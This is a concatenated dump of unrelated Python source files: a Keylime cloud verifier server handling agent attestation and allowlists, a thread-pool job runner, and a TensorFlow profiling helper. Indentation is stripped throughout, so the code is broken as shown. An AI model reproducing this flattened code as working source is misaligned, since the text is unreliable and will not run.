web_util.echo_json_response(self, 400, "agent_id not not valid")
logger.error("GET received an invalid agent ID: %s", agent_id)
return
try:
agent = session.query(VerfierMain).filter_by(agent_id=agent_id).one_or_none()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
if agent is not None:
response = cloud_verifier_common.process_get_status(agent)
web_util.echo_json_response(self, 200, "Success", response)
else:
web_util.echo_json_response(self, 404, "agent id not found")
else:
json_response = None
if "bulk" in rest_params:
agent_list = None
if ("verifier" in rest_params) and (rest_params["verifier"] != ""):
agent_list = session.query(VerfierMain).filter_by(verifier_id=rest_params["verifier"]).all()
else:
agent_list = session.query(VerfierMain).all()
json_response = {}
for agent in agent_list:
json_response[agent.agent_id] = cloud_verifier_common.process_get_status(agent)
web_util.echo_json_response(self, 200, "Success", json_response)
else:
if ("verifier" in rest_params) and (rest_params["verifier"] != ""):
json_response = (
session.query(VerfierMain.agent_id).filter_by(verifier_id=rest_params["verifier"]).all()
)
else:
json_response = session.query(VerfierMain.agent_id).all()
web_util.echo_json_response(self, 200, "Success", {"uuids": json_response})
logger.info("GET returning 200 response for agent_id list")
def delete(self):
"""This method handles the DELETE requests to remove agents from the Cloud Verifier.
Currently, only agents resources are available for DELETEing, i.e. /agents. All other DELETE uri's will return errors.
agents requests require a single agent_id parameter which identifies the agent to be deleted.
"""
session = get_session()
rest_params = web_util.get_restful_params(self.request.uri)
if rest_params is None:
web_util.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface")
return
if not web_util.validate_api_version(self, rest_params["api_version"], logger):
return
if "agents" not in rest_params:
web_util.echo_json_response(self, 400, "uri not supported")
return
agent_id = rest_params["agents"]
if agent_id is None:
web_util.echo_json_response(self, 400, "uri not supported")
logger.warning("DELETE returning 400 response. uri not supported: %s", self.request.path)
return
# If the agent ID is not valid (wrong set of characters), just
# do nothing.
if not validators.valid_agent_id(agent_id):
web_util.echo_json_response(self, 400, "agent_id not not valid")
logger.error("DELETE received an invalid agent ID: %s", agent_id)
return
try:
agent = session.query(VerfierMain).filter_by(agent_id=agent_id).first()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
if agent is None:
web_util.echo_json_response(self, 404, "agent id not found")
logger.info("DELETE returning 404 response. agent id: %s not found.", agent_id)
return
verifier_id = config.get(
"cloud_verifier", "cloudverifier_id", fallback=cloud_verifier_common.DEFAULT_VERIFIER_ID
)
if verifier_id != agent.verifier_id:
web_util.echo_json_response(self, 404, "agent id associated to this verifier")
logger.info("DELETE returning 404 response. agent id: %s not associated to this verifer.", agent_id)
return
op_state = agent.operational_state
if op_state in (states.SAVED, states.FAILED, states.TERMINATED, states.TENANT_FAILED, states.INVALID_QUOTE):
try:
verifier_db_delete_agent(session, agent_id)
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
web_util.echo_json_response(self, 200, "Success")
logger.info("DELETE returning 200 response for agent id: %s", agent_id)
else:
try:
update_agent = session.query(VerfierMain).get(agent_id)
update_agent.operational_state = states.TERMINATED
try:
session.add(update_agent)
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
session.commit()
web_util.echo_json_response(self, 202, "Accepted")
logger.info("DELETE returning 202 response for agent id: %s", agent_id)
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
def post(self):
"""This method handles the POST requests to add agents to the Cloud Verifier.
Currently, only agents resources are available for POSTing, i.e. /agents. All other POST uri's will return errors.
agents requests require a json block sent in the body
"""
session = get_session()
try:
rest_params = web_util.get_restful_params(self.request.uri)
if rest_params is None:
web_util.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface")
return
if not web_util.validate_api_version(self, rest_params["api_version"], logger):
return
if "agents" not in rest_params:
web_util.echo_json_response(self, 400, "uri not supported")
logger.warning("POST returning 400 response. uri not supported: %s", self.request.path)
return
agent_id = rest_params["agents"]
if agent_id is not None:
# If the agent ID is not valid (wrong set of
# characters), just do nothing.
if not validators.valid_agent_id(agent_id):
web_util.echo_json_response(self, 400, "agent_id not not valid")
logger.error("POST received an invalid agent ID: %s", agent_id)
return
content_length = len(self.request.body)
if content_length == 0:
web_util.echo_json_response(self, 400, "Expected non zero content length")
logger.warning("POST returning 400 response. Expected non zero content length.")
else:
json_body = json.loads(self.request.body)
agent_data = {}
agent_data["v"] = json_body["v"]
agent_data["ip"] = json_body["cloudagent_ip"]
agent_data["port"] = int(json_body["cloudagent_port"])
agent_data["operational_state"] = states.START
agent_data["public_key"] = ""
agent_data["tpm_policy"] = json_body["tpm_policy"]
agent_data["meta_data"] = json_body["metadata"]
agent_data["allowlist"] = json_body["allowlist"]
agent_data["mb_refstate"] = json_body["mb_refstate"]
agent_data["ima_sign_verification_keys"] = json_body["ima_sign_verification_keys"]
agent_data["revocation_key"] = json_body["revocation_key"]
agent_data["accept_tpm_hash_algs"] = json_body["accept_tpm_hash_algs"]
agent_data["accept_tpm_encryption_algs"] = json_body["accept_tpm_encryption_algs"]
agent_data["accept_tpm_signing_algs"] = json_body["accept_tpm_signing_algs"]
agent_data["supported_version"] = json_body["supported_version"]
agent_data["ak_tpm"] = json_body["ak_tpm"]
agent_data["mtls_cert"] = json_body.get("mtls_cert", None)
agent_data["hash_alg"] = ""
agent_data["enc_alg"] = ""
agent_data["sign_alg"] = ""
agent_data["agent_id"] = agent_id
agent_data["boottime"] = 0
agent_data["ima_pcrs"] = []
agent_data["pcr10"] = None
agent_data["next_ima_ml_entry"] = 0
agent_data["learned_ima_keyrings"] = {}
agent_data["verifier_id"] = config.get(
"cloud_verifier", "cloudverifier_id", fallback=cloud_verifier_common.DEFAULT_VERIFIER_ID
)
agent_data["verifier_ip"] = config.get("cloud_verifier", "cloudverifier_ip")
agent_data["verifier_port"] = config.get("cloud_verifier", "cloudverifier_port")
# TODO: Always error for v1.0 version after initial upgrade
if agent_data["mtls_cert"] is None and agent_data["supported_version"] != "1.0":
web_util.echo_json_response(self, 400, "mTLS certificate for agent is required!")
return
is_valid, err_msg = cloud_verifier_common.validate_agent_data(agent_data)
if not is_valid:
web_util.echo_json_response(self, 400, err_msg)
logger.warning(err_msg)
return
try:
new_agent_count = session.query(VerfierMain).filter_by(agent_id=agent_id).count()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
raise e
# don't allow overwriting
if new_agent_count > 0:
web_util.echo_json_response(self, 409, f"Agent of uuid {agent_id} already exists")
logger.warning("Agent of uuid %s already exists", agent_id)
else:
try:
# Add the agent and data
session.add(VerfierMain(**agent_data))
session.commit()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
raise e
# add default fields that are ephemeral
for key, val in exclude_db.items():
agent_data[key] = val
# Prepare SSLContext for mTLS connections
agent_mtls_cert_enabled = config.getboolean(
"cloud_verifier", "agent_mtls_cert_enabled", fallback=False
)
mtls_cert = agent_data["mtls_cert"]
agent_data["ssl_context"] = None
if agent_mtls_cert_enabled and mtls_cert:
agent_data["ssl_context"] = web_util.generate_agent_mtls_context(
mtls_cert, self.mtls_options
)
if agent_data["ssl_context"] is None:
logger.warning("Connecting to agent without mTLS: %s", agent_id)
asyncio.ensure_future(process_agent(agent_data, states.GET_QUOTE))
web_util.echo_json_response(self, 200, "Success")
logger.info("POST returning 200 response for adding agent id: %s", agent_id)
else:
web_util.echo_json_response(self, 400, "uri not supported")
logger.warning("POST returning 400 response. uri not supported")
except Exception as e:
web_util.echo_json_response(self, 400, f"Exception error: {str(e)}")
logger.warning("POST returning 400 response. Exception error: %s", e)
logger.exception(e)
def put(self):
"""This method handles the PUT requests to add agents to the Cloud Verifier.
Currently, only agents resources are available for PUTing, i.e. /agents. All other PUT uri's will return errors.
agents requests require a json block sent in the body
"""
session = get_session()
try:
rest_params = web_util.get_restful_params(self.request.uri)
if rest_params is None:
web_util.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface")
return
if not web_util.validate_api_version(self, rest_params["api_version"], logger):
return
if "agents" not in rest_params:
web_util.echo_json_response(self, 400, "uri not supported")
logger.warning("PUT returning 400 response. uri not supported: %s", self.request.path)
return
agent_id = rest_params["agents"]
if agent_id is None:
web_util.echo_json_response(self, 400, "uri not supported")
logger.warning("PUT returning 400 response. uri not supported")
# If the agent ID is not valid (wrong set of characters),
# just do nothing.
if not validators.valid_agent_id(agent_id):
web_util.echo_json_response(self, 400, "agent_id not not valid")
logger.error("PUT received an invalid agent ID: %s", agent_id)
return
try:
verifier_id = config.get(
"cloud_verifier", "cloudverifier_id", fallback=cloud_verifier_common.DEFAULT_VERIFIER_ID
)
agent = session.query(VerfierMain).filter_by(agent_id=agent_id, verifier_id=verifier_id).one()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
raise e
if agent is None:
web_util.echo_json_response(self, 404, "agent id not found")
logger.info("PUT returning 404 response. agent id: %s not found.", agent_id)
return
if "reactivate" in rest_params:
if not isinstance(agent, dict):
agent = _from_db_obj(agent)
if agent["mtls_cert"]:
agent["ssl_context"] = web_util.generate_agent_mtls_context(agent["mtls_cert"], self.mtls_options)
agent["operational_state"] = states.START
asyncio.ensure_future(process_agent(agent, states.GET_QUOTE))
web_util.echo_json_response(self, 200, "Success")
logger.info("PUT returning 200 response for agent id: %s", agent_id)
elif "stop" in rest_params:
# do stuff for terminate
logger.debug("Stopping polling on %s", agent_id)
try:
session.query(VerfierMain).filter(VerfierMain.agent_id == agent_id).update(
{"operational_state": states.TENANT_FAILED}
)
session.commit()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
web_util.echo_json_response(self, 200, "Success")
logger.info("PUT returning 200 response for agent id: %s", agent_id)
else:
web_util.echo_json_response(self, 400, "uri not supported")
logger.warning("PUT returning 400 response. uri not supported")
except Exception as e:
web_util.echo_json_response(self, 400, f"Exception error: {str(e)}")
logger.warning("PUT returning 400 response. Exception error: %s", e)
logger.exception(e)
def data_received(self, chunk):
raise NotImplementedError()
class AllowlistHandler(BaseHandler):
def head(self):
web_util.echo_json_response(self, 400, "Allowlist handler: HEAD Not Implemented")
def get(self):
"""Get an allowlist
GET /allowlists/{name}
"""
rest_params = web_util.get_restful_params(self.request.uri)
if rest_params is None or "allowlists" not in rest_params:
web_util.echo_json_response(self, 400, "Invalid URL")
return
if not web_util.validate_api_version(self, rest_params["api_version"], logger):
return
allowlist_name = rest_params["allowlists"]
if allowlist_name is None:
web_util.echo_json_response(self, 400, "Invalid URL")
logger.warning("GET returning 400 response: %s", self.request.path)
return
session = get_session()
try:
allowlist = session.query(VerifierAllowlist).filter_by(name=allowlist_name).one()
except NoResultFound:
web_util.echo_json_response(self, 404, f"Allowlist {allowlist_name} not found")
return
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
web_util.echo_json_response(self, 500, "Failed to get allowlist")
raise
response = {}
for field in ("name", "tpm_policy", "ima_policy"):
response[field] = getattr(allowlist, field, None)
web_util.echo_json_response(self, 200, "Success", response)
def delete(self):
"""Delete an allowlist
DELETE /allowlists/{name}
"""
rest_params = web_util.get_restful_params(self.request.uri)
if rest_params is None or "allowlists" not in rest_params:
web_util.echo_json_response(self, 400, "Invalid URL")
return
if not web_util.validate_api_version(self, rest_params["api_version"], logger):
return
allowlist_name = rest_params["allowlists"]
if allowlist_name is None:
web_util.echo_json_response(self, 400, "Invalid URL")
logger.warning("DELETE returning 400 response: %s", self.request.path)
return
session = get_session()
try:
session.query(VerifierAllowlist).filter_by(name=allowlist_name).one()
except NoResultFound:
web_util.echo_json_response(self, 404, f"Allowlist {allowlist_name} not found")
return
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
web_util.echo_json_response(self, 500, "Failed to get allowlist")
raise
try:
session.query(VerifierAllowlist).filter_by(name=allowlist_name).delete()
session.commit()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
web_util.echo_json_response(self, 500, "Failed to get allowlist")
raise
# NOTE(kaifeng) 204 Can not have response body, but current helper
# doesn't support this case.
self.set_status(204)
self.set_header("Content-Type", "application/json")
self.finish()
logger.info("DELETE returning 204 response for allowlist: %s", allowlist_name)
def post(self):
"""Create an allowlist
POST /allowlists/{name}
body: {"tpm_policy": {..} ...
"""
rest_params = web_util.get_restful_params(self.request.uri)
if rest_params is None or "allowlists" not in rest_params:
web_util.echo_json_response(self, 400, "Invalid URL")
return
if not web_util.validate_api_version(self, rest_params["api_version"], logger):
return
allowlist_name = rest_params["allowlists"]
if allowlist_name is None:
web_util.echo_json_response(self, 400, "Invalid URL")
return
content_length = len(self.request.body)
if content_length == 0:
web_util.echo_json_response(self, 400, "Expected non zero content length")
logger.warning("POST returning 400 response. Expected non zero content length.")
return
allowlist = {}
json_body = json.loads(self.request.body)
allowlist["name"] = allowlist_name
tpm_policy = json_body.get("tpm_policy")
if tpm_policy:
allowlist["tpm_policy"] = tpm_policy
ima_policy = json_body.get("ima_policy")
if ima_policy:
allowlist["ima_policy"] = ima_policy
session = get_session()
# don't allow overwritting
try:
al_count = session.query(VerifierAllowlist).filter_by(name=allowlist_name).count()
if al_count > 0:
web_util.echo_json_response(self, 409, f"Allowlist with name {allowlist_name} already exists")
logger.warning("Allowlist with name %s already exists", allowlist_name)
return
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
raise
try:
# Add the agent and data
session.add(VerifierAllowlist(**allowlist))
session.commit()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
raise
web_util.echo_json_response(self, 201)
logger.info("POST returning 201")
def put(self):
web_util.echo_json_response(self, 400, "Allowlist handler: PUT Not Implemented")
def data_received(self, chunk):
raise NotImplementedError()
async def invoke_get_quote(agent, need_pubkey):
failure = Failure(Component.INTERNAL, ["verifier"])
if agent is None:
raise Exception("agent deleted while being processed")
params = cloud_verifier_common.prepare_get_quote(agent)
partial_req = "1"
if need_pubkey:
partial_req = "0"
# TODO: remove special handling after initial upgrade
if agent["ssl_context"]:
res = tornado_requests.request(
"GET",
f"https://{agent['ip']}:{agent['port']}/v{agent['supported_version']}/quotes/integrity"
f"?nonce={params['nonce']}&mask={params['mask']}"
f"&partial={partial_req}&ima_ml_entry={params['ima_ml_entry']}",
context=agent["ssl_context"],
)
else:
res = tornado_requests.request(
"GET",
f"http://{agent['ip']}:{agent['port']}/v{agent['supported_version']}/quotes/integrity"
f"?nonce={params['nonce']}&mask={params['mask']}"
f"&partial={partial_req}&ima_ml_entry={params['ima_ml_entry']}",
)
response = await res
if response.status_code != 200:
# this is a connection error, retry get quote
if response.status_code in [500, 599]:
asyncio.ensure_future(process_agent(agent, states.GET_QUOTE_RETRY))
else:
# catastrophic error, do not continue
logger.critical(
"Unexpected Get Quote response error for cloud agent %s, Error: %s",
agent["agent_id"],
response.status_code,
)
failure.add_event("no_quote", "Unexpected Get Quote reponse from agent", False)
asyncio.ensure_future(process_agent(agent, states.FAILED, failure))
else:
try:
json_response = json.loads(response.body)
# validate the cloud agent response
if "provide_V" not in agent:
agent["provide_V"] = True
agentAttestState = get_AgentAttestStates().get_by_agent_id(agent["agent_id"])
failure = cloud_verifier_common.process_quote_response(agent, json_response["results"], agentAttestState)
if not failure:
if agent["provide_V"]:
asyncio.ensure_future(process_agent(agent, states.PROVIDE_V))
else:
asyncio.ensure_future(process_agent(agent, states.GET_QUOTE))
else:
asyncio.ensure_future(process_agent(agent, states.INVALID_QUOTE, failure))
# store the attestation state
store_attestation_state(agentAttestState)
except Exception as e:
logger.exception(e)
failure.add_event(
"exception", {"context": "Agent caused the verifier to throw an exception", "data": str(e)}, False
)
asyncio.ensure_future(process_agent(agent, states.FAILED, failure))
async def invoke_provide_v(agent):
failure = Failure(Component.INTERNAL, ["verifier"])
if agent is None:
raise Exception("Agent deleted while being processed")
try:
if agent["pending_event"] is not None:
agent["pending_event"] = None
except KeyError:
pass
v_json_message = cloud_verifier_common.prepare_v(agent)
# TODO: remove special handling after initial upgrade
if agent["ssl_context"]:
res = tornado_requests.request(
"POST",
f"https://{agent['ip']}:{agent['port']}/v{agent['supported_version']}/keys/vkey",
data=v_json_message,
context=agent["ssl_context"],
)
else:
res = tornado_requests.request(
"POST", f"http://{agent['ip']}:{agent['port']}/v{agent['supported_version']}/keys/vkey", data=v_json_message
)
response = await res
if response.status_code != 200:
if response.status_code in [500, 599]:
asyncio.ensure_future(process_agent(agent, states.PROVIDE_V_RETRY))
else:
# catastrophic error, do not continue
logger.critical(
"Unexpected Provide V response error for cloud agent %s, Error: %s",
agent["agent_id"],
response.status_code,
)
failure.add_event("no_v", {"message": "Unexpected provide V response", "data": response.status_code}, False)
asyncio.ensure_future(process_agent(agent, states.FAILED, failure))
else:
asyncio.ensure_future(process_agent(agent, states.GET_QUOTE))
async def process_agent(agent, new_operational_state, failure=Failure(Component.INTERNAL, ["verifier"])):
# Convert to dict if the agent arg is a db object
if not isinstance(agent, dict):
agent = _from_db_obj(agent)
session = get_session()
try: # pylint: disable=R1702
main_agent_operational_state = agent["operational_state"]
try:
stored_agent = session.query(VerfierMain).filter_by(agent_id=str(agent["agent_id"])).first()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
# if the user did terminated this agent
if stored_agent.operational_state == states.TERMINATED:
logger.warning("Agent %s terminated by user.", agent["agent_id"])
if agent["pending_event"] is not None:
tornado.ioloop.IOLoop.current().remove_timeout(agent["pending_event"])
verifier_db_delete_agent(session, agent["agent_id"])
return
# if the user tells us to stop polling because the tenant quote check failed
if stored_agent.operational_state == states.TENANT_FAILED:
logger.warning("Agent %s has failed tenant quote. Stopping polling", agent["agent_id"])
if agent["pending_event"] is not None:
tornado.ioloop.IOLoop.current().remove_timeout(agent["pending_event"])
return
# If failed during processing, log regardless and drop it on the floor
# The administration application (tenant) can GET the status and act accordingly (delete/retry/etc).
if new_operational_state in (states.FAILED, states.INVALID_QUOTE):
assert failure, "States FAILED and INVALID QUOTE should only be reached with a failure message"
if agent.get("severity_level") is None or agent["severity_level"] < failure.highest_severity.severity:
agent["severity_level"] = failure.highest_severity.severity
agent["last_event_id"] = failure.highest_severity_event.event_id
agent["operational_state"] = new_operational_state
# issue notification for invalid quotes
if new_operational_state == states.INVALID_QUOTE:
cloud_verifier_common.notify_error(agent, event=failure.highest_severity_event)
# When the failure is irrecoverable we stop polling the agent
if not failure.recoverable or failure.highest_severity == MAX_SEVERITY_LABEL:
if agent["pending_event"] is not None:
tornado.ioloop.IOLoop.current().remove_timeout(agent["pending_event"])
for key in exclude_db:
if key in agent:
del agent[key]
session.query(VerfierMain).filter_by(agent_id=agent["agent_id"]).update(agent)
session.commit()
# propagate all state, but remove none DB keys first (using exclude_db)
try:
agent_db = dict(agent)
for key in exclude_db:
if key in agent_db:
del agent_db[key]
session.query(VerfierMain).filter_by(agent_id=agent_db["agent_id"]).update(agent_db)
session.commit()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
# If agent was in a failed state we check if we either stop polling
# or just add it again to the event loop
if new_operational_state in [states.FAILED, states.INVALID_QUOTE]:
if not failure.recoverable or failure.highest_severity == MAX_SEVERITY_LABEL:
logger.warning("Agent %s failed, stopping polling", agent["agent_id"])
return
await invoke_get_quote(agent, False)
return
# if new, get a quote
if main_agent_operational_state == states.START and new_operational_state == states.GET_QUOTE:
agent["num_retries"] = 0
agent["operational_state"] = states.GET_QUOTE
await invoke_get_quote(agent, True)
return
if main_agent_operational_state == states.GET_QUOTE and new_operational_state == states.PROVIDE_V:
agent["num_retries"] = 0
agent["operational_state"] = states.PROVIDE_V
await invoke_provide_v(agent)
return
if (
main_agent_operational_state in (states.PROVIDE_V, states.GET_QUOTE)
and new_operational_state == states.GET_QUOTE
):
agent["num_retries"] = 0
interval = config.getfloat("cloud_verifier", "quote_interval")
agent["operational_state"] = states.GET_QUOTE
if interval == 0:
await invoke_get_quote(agent, False)
else:
logger.debug("Setting up callback to check again in %f seconds", interval)
# set up a call back to check again
cb = functools.partial(invoke_get_quote, agent, False)
pending = tornado.ioloop.IOLoop.current().call_later(interval, cb)
agent["pending_event"] = pending
return
maxr = config.getint("cloud_verifier", "max_retries")
interval = config.getfloat("cloud_verifier", "retry_interval")
exponential_backoff = config.getboolean("cloud_verifier", "exponential_backoff")
if main_agent_operational_state == states.GET_QUOTE and new_operational_state == states.GET_QUOTE_RETRY:
if agent["num_retries"] >= maxr:
logger.warning(
"Agent %s was not reachable for quote in %d tries, setting state to FAILED", agent["agent_id"], maxr
)
failure.add_event("not_reachable", "agent was not reachable from verifier", False)
if agent["first_verified"]: # only notify on previously good agents
cloud_verifier_common.notify_error(
agent, msgtype="comm_error", event=failure.highest_severity_event
)
else:
logger.debug("Communication error for new agent. No notification will be sent")
await process_agent(agent, states.FAILED, failure)
else:
agent["operational_state"] = states.GET_QUOTE
cb = functools.partial(invoke_get_quote, agent, True)
agent["num_retries"] += 1
next_retry = retry.retry_time(exponential_backoff, interval, agent["num_retries"], logger)
logger.info(
"Connection to %s refused after %d/%d tries, trying again in %f seconds",
agent["ip"],
agent["num_retries"],
maxr,
next_retry,
)
tornado.ioloop.IOLoop.current().call_later(next_retry, cb)
return
if main_agent_operational_state == states.PROVIDE_V and new_operational_state == states.PROVIDE_V_RETRY:
if agent["num_retries"] >= maxr:
logger.warning(
"Agent %s was not reachable to provide v in %d tries, setting state to FAILED",
agent["agent_id"],
maxr,
)
failure.add_event("not_reachable_v", "agent was not reachable to provide V", False)
cloud_verifier_common.notify_error(agent, msgtype="comm_error", event=failure.highest_severity_event)
await process_agent(agent, states.FAILED, failure)
else:
agent["operational_state"] = states.PROVIDE_V
cb = functools.partial(invoke_provide_v, agent)
agent["num_retries"] += 1
next_retry = retry.retry_time(exponential_backoff, interval, agent["num_retries"], logger)
logger.info(
"Connection to %s refused after %d/%d tries, trying again in %f seconds",
agent["ip"],
agent["num_retries"],
maxr,
next_retry,
)
tornado.ioloop.IOLoop.current().call_later(next_retry, cb)
return
raise Exception("nothing should ever fall out of this!")
except Exception as e:
logger.error("Polling thread error: %s", e)
logger.exception(e)
failure.add_event(
"exception", {"context": "Agent caused the verifier to throw an exception", "data": str(e)}, False
)
await process_agent(agent, states.FAILED, failure)
async def activate_agents(verifier_id, verifier_ip, verifier_port, mtls_options):
session = get_session()
aas = get_AgentAttestStates()
try:
agents = session.query(VerfierMain).filter_by(verifier_id=verifier_id).all()
for agent in agents:
agent.verifier_ip = verifier_ip
agent.verifier_host = verifier_port
agent_run = _from_db_obj(agent)
if agent_run["mtls_cert"]:
agent_run["ssl_context"] = web_util.generate_agent_mtls_context(agent_run["mtls_cert"], mtls_options)
if agent.operational_state == states.START:
asyncio.ensure_future(process_agent(agent_run, states.GET_QUOTE))
if agent.boottime:
ima_pcrs_dict = {}
for pcr_num in agent.ima_pcrs:
ima_pcrs_dict[pcr_num] = getattr(agent, f"pcr{pcr_num}")
aas.add(
agent.agent_id, agent.boottime, ima_pcrs_dict, agent.next_ima_ml_entry, agent.learned_ima_keyrings
)
session.commit()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
def main():
"""Main method of the Cloud Verifier Server. This method is encapsulated in a function for packaging to allow it to be
called as a function by an external program."""
cloudverifier_port = config.get("cloud_verifier", "cloudverifier_port")
cloudverifier_host = config.get("cloud_verifier", "cloudverifier_ip")
cloudverifier_id = config.get(
"cloud_verifier", "cloudverifier_id", fallback=cloud_verifier_common.DEFAULT_VERIFIER_ID
)
# Check if measured boot was configured correctly
if policies.get_policy(config.MEASUREDBOOT_POLICYNAME) is None:
logger.error('Measued boot policy "%s" could not be found!', config.MEASUREDBOOT_POLICYNAME)
raise Exception(f'Measued boot policy "{config.MEASUREDBOOT_POLICYNAME}" could not be found!')
# allow tornado's max upload size to be configurable
max_upload_size = None
if config.has_option("cloud_verifier", "max_upload_size"):
max_upload_size = int(config.get("cloud_verifier", "max_upload_size"))
# set a conservative general umask
os.umask(0o077)
VerfierMain.metadata.create_all(engine, checkfirst=True)
session = get_session()
try:
query_all = session.query(VerfierMain).all()
for row in query_all:
if row.operational_state in states.APPROVED_REACTIVATE_STATES:
row.operational_state = states.START
session.commit()
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s", e)
num = session.query(VerfierMain.agent_id).count()
if num > 0:
agent_ids = session.query(VerfierMain.agent_id).all()
logger.info("Agent ids in db loaded from file: %s", agent_ids)
logger.info("Starting Cloud Verifier (tornado) on port %s, use <Ctrl-C> to stop", cloudverifier_port)
# print out API versions we support
keylime_api_version.log_api_versions(logger)
context, mtls_options = web_util.init_mtls(logger=logger)
# Check for user defined CA to connect to agent
agent_mtls_cert = config.get("cloud_verifier", "agent_mtls_cert", fallback=None)
agent_mtls_private_key = config.get("cloud_verifier", "agent_mtls_private_key", fallback=None)
agent_mtls_private_key_pw = config.get("cloud_verifier", "agent_mtls_private_key_pw", fallback=None)
# Only set custom options if the cert should not be the same as used by the verifier
if agent_mtls_cert != "CV":
mtls_options = (agent_mtls_cert, agent_mtls_private_key, agent_mtls_private_key_pw)
app = tornado.web.Application(
[
(r"/v?[0-9]+(?:\.[0-9]+)?/agents/.*", AgentsHandler, {"mtls_options": mtls_options}),
(r"/v?[0-9]+(?:\.[0-9]+)?/allowlists/.*", AllowlistHandler),
(r"/versions?", VersionHandler),
(r".*", MainHandler),
]
)
sockets = tornado.netutil.bind_sockets(int(cloudverifier_port), address=cloudverifier_host)
def server_process(task_id):
logger.info("Starting server of process %s", task_id)
engine.dispose()
server = tornado.httpserver.HTTPServer(app, ssl_options=context, max_buffer_size=max_upload_size)
server.add_sockets(sockets)
def server_sig_handler(*_):
logger.info("Shutting down server %s..", task_id)
# Stop server to not accept new incoming connections
server.stop()
# Wait for all connections to be closed and then stop ioloop
async def stop():
await server.close_all_connections()
tornado.ioloop.IOLoop.current().stop()
asyncio.ensure_future(stop())
# Attach signal handler to ioloop.
# Do not use signal.signal(..) for that because it does not work!
loop = asyncio.get_event_loop()
loop.add_signal_handler(signal.SIGINT, server_sig_handler)
loop.add_signal_handler(signal.SIGTERM, server_sig_handler)
server.start()
if task_id == 0:
# Reactivate agents
asyncio.ensure_future(
activate_agents(cloudverifier_id, cloudverifier_host, cloudverifier_port, mtls_options)
)
tornado.ioloop.IOLoop.current().start()
logger.debug("Server %s stopped.", task_id)
sys.exit(0)
processes = []
def sig_handler(*_):
if config.getboolean("cloud_verifier", "revocation_notifier"):
revocation_notifier.stop_broker()
for p in processes:
p.join()
sys.exit(0)
signal.signal(signal.SIGINT, sig_handler)
signal.signal(signal.SIGTERM, sig_handler)
if config.getboolean("cloud_verifier", "revocation_notifier"):
logger.info(
"Starting service for revocation notifications on port %s",
config.getint("cloud_verifier", "revocation_notifier_port"),
)
revocation_notifier.start_broker()
num_workers = config.getint("cloud_verifier", "multiprocessing_pool_num_workers")
if num_workers <= 0:
num_workers = tornado.process.cpu_count()
for task_id in range(0, num_workers):
process = Process(target=server_process, args=(task_id,))
process.start()
processes.append(process)
|
job.py
|
import logging
import traceback
from queue import Queue
from threading import Thread
class RetryException(Exception):
retry_count = 1
pass
class ItemWrapper():
def __init__(self, item):
self.item = item
class Job:
def __init__(self, numThreads, iterable=[], func=None, raiseException=False):
self.numThreads = numThreads
self.queue = Queue()
self.exception = None
self.results = []
self.func = func
self.enqueue(iterable)
self.raiseException = raiseException
def enqueue(self, iterable):
for item in iterable:
self.add(item)
def add(self, item):
self.queue.put(item)
def worker(self):
while not self.queue.empty():
item = self.queue.get()
func = item if not isinstance(item, ItemWrapper) else item.item
try:
if func:
ret = func() if not self.func else self.func(func)
self.results.append(ret) if not isinstance(ret, list) else self.results.extend(ret)
except Exception as e:
if isinstance(e, RetryException) and not isinstance(item, ItemWrapper):
if e.retry_count > 0:
e.retry_count -= 1
self.add(ItemWrapper(func))
logging.info("Retry: '%s'; Readding item into queue", e)
continue
self.exception = e
logging.error(e)
traceback.print_exc()
finally:
self.queue.task_done()
def run(self):
logging.info("Using %s threads for ~%d items", self.numThreads, self.queue.qsize())
if self.numThreads:
for i in range(self.numThreads):
Thread(target=self.worker, daemon=True).start()
self.queue.join()
else:
self.worker()
if self.exception:
logging.error("Error occurred: %s", self.exception)
if self.raiseException:
raise self.exception
return self.results
|
_profiling.py
|
import json
import os
import threading
import tensorflow as tf
from tensorflow.python.client import timeline
class Timeliner:
# _timeline_dict = None
# options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
# run_metadata = tf.RunMetadata()
def update_timeline(self, chrome_trace):
# convert chrome trace to python dict
chrome_trace_dict = json.loads(chrome_trace)
# for first run store full trace
if self._timeline_dict is None:
self._timeline_dict = chrome_trace_dict
# for other - update only time consumption, not definitions
else:
for event in chrome_trace_dict['traceEvents']:
# events time consumption started with 'ts' prefix
if 'ts' in event:
self._timeline_dict['traceEvents'].append(event)
def save(self, f_name):
os.path.isdir(os.path.dirname(f_name)) or os.makedirs(os.path.dirname(f_name))
with open(f_name, 'w') as f:
json.dump(self._timeline_dict, f)
def add_run(self, run_metadata=None):
if run_metadata is None:
run_metadata = self.run_metadata
fetched_timeline = timeline.Timeline(run_metadata.step_stats)
chrome_trace = fetched_timeline.generate_chrome_trace_format()
self.update_timeline(chrome_trace)
def launch_tensorboard(log_dir, same_process=False, port=6006):
if port is None:
port = 6006
if same_process:
from tensorboard import main as tb
tf.flags.FLAGS.logdir = log_dir
tf.flags.FLAGS.reload_interval = 1
tf.flags.FLAGS.port = port
threading.Thread(target=tb.main).start()
else:
def run_tb():
os.system('tensorboard --logdir=%s --port=%d' % (log_dir,port))
threading.Thread(target=run_tb).start()
try:
import phi.local.hostname
host = phi.local.hostname.hostname
except (ImportError, AttributeError):
host = 'localhost' # socket.gethostname()
url = "http://%s:%d/" % (host,port)
return url
|
signal.py
|
from threading import Thread
